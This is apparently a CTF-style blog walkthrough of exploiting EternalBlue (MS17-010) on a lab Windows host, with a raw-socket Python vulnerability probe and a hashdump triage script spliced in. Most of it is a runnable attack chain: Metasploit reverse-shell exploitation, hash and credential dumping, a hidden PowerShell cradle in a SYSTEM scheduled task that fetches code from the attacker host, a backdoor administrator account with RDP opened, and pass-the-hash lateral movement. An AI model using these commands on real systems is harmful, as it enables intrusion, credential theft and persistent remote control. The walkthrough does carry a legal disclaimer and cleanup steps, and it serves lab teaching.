Eternal Blue (ms17-010) — Full Walkthrough

EternalBlue (MS17‑010) — A Clean, Real-World Walkthrough

From host setup to exploitation and maintaining access — exactly how I work this box in a lab. No fluff. Every decision justified.

Vuln VM: VirtualBox | Protocol: SMBv1 | Exploit: MS17‑010 | Post‑Ex: Meterpreter & Native

Overview

This post documents my exact process exploiting a Windows host vulnerable to MS17‑010 (EternalBlue). I hosted the machine on VirtualBox, verified reachability, enumerated SMB thoroughly, confirmed the vuln with nmap scripts, and executed the exploit using both Metasploit and a manual approach. I also cover maintaining access and proper cleanup. Treat this as a field-tested checklist you can adapt.

Legal: Only attack systems you own or have written permission to test. This lab is purely educational.

1) Lab Setup

Virtualization

  • VirtualBox with two adapters: Host‑Only (for stable IPs) and NAT (optional for internet).
  • Attacker: Kali/Parrot. Target: a Windows host with SMBv1 enabled and the MS17‑010 update not installed (Windows 7 SP1 / Server 2008 R2 are the classic lab choices).

Connectivity Check

# Attacker
ip addr | grep -E "inet\s(192\.168|10\.|172\.)"
ping -c 2 <target-ip>

If ping is blocked (Windows Firewall often drops ICMP echo by default), fall back to a TCP check: nc -vz <target-ip> 445.

2) Recon & Enumeration

A) Quick TCP sweep

sudo nmap -Pn -sS -T4 -p- --min-rate 2000 -oN scan_full.txt <target-ip>

I want fast signal on exposed services (-sS needs raw sockets, hence sudo). For EternalBlue, port 445/tcp must be open; 139/tcp is a useful secondary indicator of NetBIOS-era SMB.

B) Service/Version + SMB vulns

nmap -sV -p 139,445 --script "smb-protocols,smb-os-discovery,smb2-security-mode,smb2-time,smb2-capabilities,smb-vuln-ms17-010" -oN scan_smb.txt <target-ip>

Here smb-protocols lists the dialects the host accepts (NT LM 0.12 in that list means SMBv1 is still on), smb-os-discovery gives me the build, and smb-vuln-ms17-010 gives a straight answer. I drop -sC here because an explicit --script list replaces the default set anyway; add "default" to the list if you also want those scripts.

C) SMB enumeration (users, shares)

# Anonymous share check
smbclient -L //<target-ip>/ -N

# Deeper enumeration
enum4linux -a <target-ip> | tee enum4linux.txt

If guest access is open, that’s a bonus path, but EternalBlue itself needs no credentials: what it needs is SMBv1 reachable on 445 and the patch absent.

3) Confirming MS17‑010

If the NSE script returns VULNERABLE, I still cross‑check with Metasploit’s auxiliary scanner to avoid false positives.

msfconsole -q
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS <target-ip>
run

Two independent checks reduce noise. The scanner also reports whether the DoublePulsar backdoor is already present on the host (CHECK_DOPU, on by default); if it is, someone exploited this box before you and the kernel may already be in a fragile state. If both checks say vulnerable, I proceed.
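To make the "straight answer" less magic, here is the probe that smb-vuln-ms17-010 and the Metasploit scanner both perform, written out as an added example against raw sockets so every message on the wire is visible. This is my code, not the post's, the NSE script's or the module's: an anonymous SMBv1 session, a tree connect to IPC$, then a Trans2 SESSION_SETUP request; an unpatched srv.sys answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205), a patched one STATUS_NOT_IMPLEMENTED or STATUS_ACCESS_DENIED. The status-code mapping is the decision the scanners make; the packet field values (MaxBufferSize 4356, capabilities 0x50, the Flags2 choice) are conventional values I picked. Lab targets only.

```python
"""MS17-010 probe over raw SMBv1 (added example; not the NSE script or the MSF module)."""
import socket
import struct

STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205   # unpatched srv.sys answers this
STATUS_NOT_IMPLEMENTED = 0xC0000002           # patched
STATUS_ACCESS_DENIED = 0xC0000022             # patched (seen on some builds)

SMB_COM_TRANSACTION2, SMB_COM_NEGOTIATE = 0x32, 0x72
SMB_COM_SESSION_SETUP_ANDX, SMB_COM_TREE_CONNECT_ANDX = 0x73, 0x75
TRANS2_SESSION_SETUP = 0x000E   # subcommand no server implements; how it is refused leaks patch state


def netbios(payload):
    """NetBIOS session service frame: type 0x00 plus a 3-byte big-endian length."""
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


def smb_header(command, status=0, tid=0, uid=0, mid=0):
    """32-byte SMBv1 header. Flags2 0x4001 = NT status codes + long names, no Unicode and
    no extended security, so the anonymous SESSION_SETUP needs no SPNEGO blob."""
    return struct.pack("<4sBIBHHQHHHHH", b"\xffSMB", command, status, 0x18, 0x4001,
                       0, 0, 0, tid, 0xFEFF, uid, mid)


def negotiate_request():
    dialects = b"\x02NT LM 0.12\x00"      # offer only the NT dialect, so the server never upgrades to SMB2
    return netbios(smb_header(SMB_COM_NEGOTIATE) + struct.pack("<BH", 0, len(dialects)) + dialects)


def session_setup_request():
    """Null session (WordCount 13): 1-byte OEM password, empty account/domain/OS/LanMan strings."""
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 4356, 10, 0, 0, 1, 0, 0, 0x50)
    data = b"\x00" * 5
    return netbios(smb_header(SMB_COM_SESSION_SETUP_ANDX) + b"\x0d" + words
                   + struct.pack("<H", len(data)) + data)


def tree_connect_request(host, uid):
    """Attach the session to IPC$ (WordCount 4; the share password is a single null byte)."""
    data = b"\x00" + ("\\\\%s\\IPC$" % host).encode() + b"\x00?????\x00"
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)
    return netbios(smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid) + b"\x04" + words
                   + struct.pack("<H", len(data)) + data)


def trans2_probe(tid, uid):
    """Trans2 SESSION_SETUP with 12 zero parameter bytes. ParameterOffset 66 = header 32
    + WordCount 1 + 30 words + ByteCount 2 + 1 pad byte, measured from the SMB header."""
    params = b"\x00" * 12
    words = struct.pack("<HHHHBBHIHHHHHBBH", len(params), 0, 1, 0, 0, 0, 0, 0, 0,
                        len(params), 66, 0, 0, 1, 0, TRANS2_SESSION_SETUP)
    data = b"\x00" + params
    return netbios(smb_header(SMB_COM_TRANSACTION2, tid=tid, uid=uid) + b"\x0f" + words
                   + struct.pack("<H", len(data)) + data)


def nt_status(reply):
    """NT status sits at SMB header offset 5; the 4-byte NetBIOS frame precedes the header."""
    return struct.unpack_from("<I", reply, 4 + 5)[0]


def header_ids(reply):
    """(TID, UID) assigned by the server, at header offsets 24 and 28."""
    return struct.unpack_from("<H", reply, 4 + 24)[0], struct.unpack_from("<H", reply, 4 + 28)[0]


def classify(status):
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if status in (STATUS_NOT_IMPLEMENTED, STATUS_ACCESS_DENIED):
        return "PATCHED"
    return "UNKNOWN (0x%08X)" % status


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection (SMBv1 disabled or filtered?)")
        buf += chunk
    return buf


def recv_smb(sock):
    """Read one NetBIOS-framed SMBv1 message."""
    hdr = recv_exact(sock, 4)
    reply = hdr + recv_exact(sock, int.from_bytes(hdr[1:4], "big"))
    if reply[4:8] != b"\xffSMB":
        raise ValueError("not an SMBv1 reply")
    return reply


def check_ms17_010(host, port=445, timeout=5.0):
    """Run the four-message exchange; returns VULNERABLE / PATCHED / UNKNOWN or why it stopped."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            for name, pkt in (("negotiate", negotiate_request()),
                              ("anonymous session setup", session_setup_request())):
                s.sendall(pkt)
                reply = recv_smb(s)
                if nt_status(reply):
                    return "%s refused: 0x%08X" % (name, nt_status(reply))
            _, uid = header_ids(reply)
            s.sendall(tree_connect_request(host, uid))
            reply = recv_smb(s)
            if nt_status(reply):
                return "IPC$ tree connect refused: 0x%08X" % nt_status(reply)
            tid, _ = header_ids(reply)
            s.sendall(trans2_probe(tid, uid))
            return classify(nt_status(recv_smb(s)))
    except (OSError, ValueError) as exc:       # includes timeouts and closed sockets
        return "no SMBv1 answer: %s" % exc


if __name__ == "__main__":
    import sys
    print(check_ms17_010(sys.argv[1]))
```

Run it as python3 probe.py <target-ip>. A host that closes the socket after the negotiate has SMBv1 off, which is the patch-independent reason the exploit cannot work; a host that refuses the null session needs the Metasploit scanner with SMBUser/SMBPass set, since the Trans2 probe itself is the same either way.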

4) Exploitation (Metasploit route)

The ms17_010_eternalblue module carries 64‑bit kernel shellcode and only accepts x64 targets, so the payload is the x64 Meterpreter (VERIFY_ARCH, on by default, refuses to fire if the remote architecture does not match). For a 32‑bit Windows 7 host use exploit/windows/smb/ms17_010_psexec instead, which supports both architectures but needs a named pipe it can reach (anonymously or with creds).

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target-ip>
set RPORT 445
set VERIFY_ARCH true
set VERIFY_TARGET true
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <attacker-ip>
set LPORT 4444
run
Tip: If you get “Exploit completed, but no session was created”, it’s almost always an LHOST the target cannot reach (pick the host‑only interface address) or the exploit simply not triggering on that attempt: the kernel pool grooming is not deterministic and the module itself is documented as needing repeated runs. Rerun before changing anything else. Switching to a 32‑bit payload does not help with this module; it only ships x64 shellcode.
set LHOST <attacker-host-only-ip>
run

Post‑ex sanity checks

# Meterpreter commands
getuid
sysinfo
getprivs
# Windows commands: drop into a command shell first ("exit" returns to Meterpreter)
shell
net config workstation
ipconfig
exit

5) Exploitation (Manual notes)

I keep a manual route handy for education and edge cases: send crafted SMB packets that trigger the pool overflow and drop a shell. In practice, most learners should stick to MSF for stability; manual PoCs are noisy and version‑sensitive. If you go manual, ensure:

  • Correct OS build (Win7 SP1 / 2008 R2 are the classic, best‑understood targets),
  • SMBv1 enabled and the MS17‑010 update absent,
  • Proper architecture selection and reliable shellcode.
Manual EternalBlue PoCs corrupt kernel pool memory and can BSOD the target when the groom lands badly. Use snapshots.

6) Immediate Looting

Hashes & Creds

# Meterpreter (the EternalBlue session already runs as SYSTEM, which hashdump needs)
hashdump
# Or kiwi: the session must live in a process matching the target's architecture (x64 here)
load kiwi
creds_all

Token & Privs

# Meterpreter
getprivs
load incognito
list_tokens -u
# Windows command (run it from "shell")
whoami /all

Dumping hashes lets me move laterally with pass‑the‑hash (an NT hash needs no cracking) or crack offline with hashcat (-m 1000 for NTLM).

7) Maintaining Access (Ethical Lab Only)

On a real engagement, persistence requires explicit approval and thorough documentation. In a lab, I demonstrate minimally invasive options and then remove them.

A) Meterpreter persistence (quick demo)

# In a Meterpreter session
run persistence -U -i 30 -p 4444 -r <attacker-ip>

-U installs at user logon and -i 30 makes it call back every 30 seconds; it drops a VBS stager in %TEMP% and a Run key, so it is easy to spot. This Meterpreter script is deprecated; current Metasploit exposes the same thing as exploit/windows/local/persistence (set SESSION and run it from msfconsole). For modern OPSEC, I prefer native approaches that leave no Metasploit artifacts:

B) Native schtasks + PowerShell one‑liner

# On the target (as SYSTEM/Administrator). ps.ps1 must be served from the attacker box
# (e.g. python3 -m http.server 8000 in the directory holding it), or the task fires and does nothing.
schtasks /Create /SC ONLOGON /TN Updater /TR "powershell -WindowStyle Hidden -c \"IEX(New-Object Net.WebClient).DownloadString('http://<attacker-ip>:8000/ps.ps1')\"" /RU SYSTEM /F

A hidden PowerShell download cradle over plain HTTP is a well‑known detection signature; that is fine for a lab. The removal command is in the cleanup section.

C) Enable RDP & drop a user (lab‑only)

net user analyst P@ssw0rd! /add
net localgroup administrators analyst /add
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

8) Lateral Movement (Brief)

If I obtain domain creds or local admin hashes, I test neighboring hosts with SMB sessions, PSExec, or WMI. psexec.py uploads a service binary and is noisy; wmiexec.py runs commands through WMI without dropping a binary.

# Using Impacket from the attacker. Hashes go in -hashes LM:NT, never in the password
# field; the LM half may be left empty (-hashes :<NT>).
psexec.py '<domain>/<user>:<pass>'@<target2-ip>
psexec.py <domain>/<user>@<target2-ip> -hashes <LM:NT>
wmiexec.py <domain>/<user>@<target2-ip> -hashes <LM:NT>
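Sections 6 and 8 meet at the hashdump output, so here is an added example of how I triage it before cracking or passing anything. This is my code, not part of the post: it parses pwdump-format lines, flags blank passwords, stored LM hashes and the RID 500 account, and emits both a hashcat -m 1000 input (user:hash, for --username) and the Impacket -hashes argument. The sample dump is constructed; the only real value in it is the Administrator NT hash, which is the well-known hash of "password".

```python
"""Triage Meterpreter hashdump output (added example; sample data is constructed)."""
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": account has a blank password

# pwdump format, one account per line: user:rid:lm:nt:::
PWDUMP = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")

# Constructed sample. Administrator's NT hash is the well-known hash of "password";
# the analyst hash is an arbitrary placeholder.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
analyst:1001:aad3b435b51404eeaad3b435b51404ee:4f2a9c1e6b7d8e5a3c0f1d2b4e6a8c9d:::
"""


def parse_hashdump(text):
    """Parse pwdump lines; blank lines and anything that is not an account record are skipped."""
    entries = []
    for line in text.splitlines():
        m = PWDUMP.match(line.strip())
        if m:
            d = m.groupdict()
            d["rid"] = int(d["rid"])
            d["lm"], d["nt"] = d["lm"].lower(), d["nt"].lower()
            entries.append(d)
    return entries


def triage(entries):
    """Per-account notes worth reading before spending GPU time."""
    notes = {}
    for e in entries:
        flags = []
        if e["nt"] == EMPTY_NT:
            flags.append("blank password")
        if e["lm"] != EMPTY_LM:
            flags.append("LM hash stored (crack with -m 3000 first: max 14 chars, case folded)")
        if e["rid"] == 500:
            flags.append("built-in Administrator (RID 500): remote admin not filtered by UAC token policy")
        notes[e["user"]] = flags
    return notes


def hashcat_lines(entries):
    """Input for `hashcat -m 1000 --username hashes.txt wordlist`; blank passwords need no cracking."""
    return ["%s:%s" % (e["user"], e["nt"]) for e in entries if e["nt"] != EMPTY_NT]


def impacket_hashes(entry):
    """Value for Impacket's -hashes option (LM:NT); an empty LM half is written as ':<NT>'."""
    lm = "" if entry["lm"] == EMPTY_LM else entry["lm"]
    return "%s:%s" % (lm, entry["nt"])


def pth_commands(entries, target, domain=""):
    """Pass-the-hash command lines; no domain prefix means a local SAM account."""
    prefix = domain + "/" if domain else ""
    return ["wmiexec.py %s%s@%s -hashes %s" % (prefix, e["user"], target, impacket_hashes(e))
            for e in entries if e["nt"] != EMPTY_NT]


if __name__ == "__main__":
    found = parse_hashdump(SAMPLE_HASHDUMP)
    for user, flags in triage(found).items():
        print(user, flags)
    print("\n".join(hashcat_lines(found)))
    print("\n".join(pth_commands(found, "<target2-ip>")))
```

The RID 500 note matters on workgroup hosts: by default, remote connections with other local administrator accounts receive a filtered token (LocalAccountTokenFilterPolicy), so pass-the-hash with the built-in Administrator is the one that reliably gives admin over SMB/WMI.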

9) Cleanup

  • Remove users you created; disable RDP if you enabled it (both the registry value and the firewall rule group).
  • Delete dropped binaries/scripts and clear scheduled tasks.
  • Close sessions, revert VM snapshots.

# Example cleanup (mirrors what section 7 changed)
schtasks /Delete /TN Updater /F
net localgroup administrators analyst /del
net user analyst /del
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=No

10) Troubleshooting Notes

  • No session created? Validate LHOST is reachable from the target; rerun the module a few times (the exploit is not deterministic); check the host firewall.
  • Target BSODs? Your PoC/payload is likely unstable, or the pool groom landed badly; snapshot first and adjust.
  • Script says vulnerable but exploit fails? The host may be partially patched, a previous attempt may have left the kernel in a bad state (revert the snapshot), or third‑party AV interferes.

Key Takeaways

  • Independent confirmation beats rushing to exploit.
  • Payload architecture + network reachability decide success more often than “magic” modules.
  • Persistence is a discipline—prove it works, then clean up.


© Vaibhav Mulak — CTF Writeups. Crafted for practitioners who care about doing things right.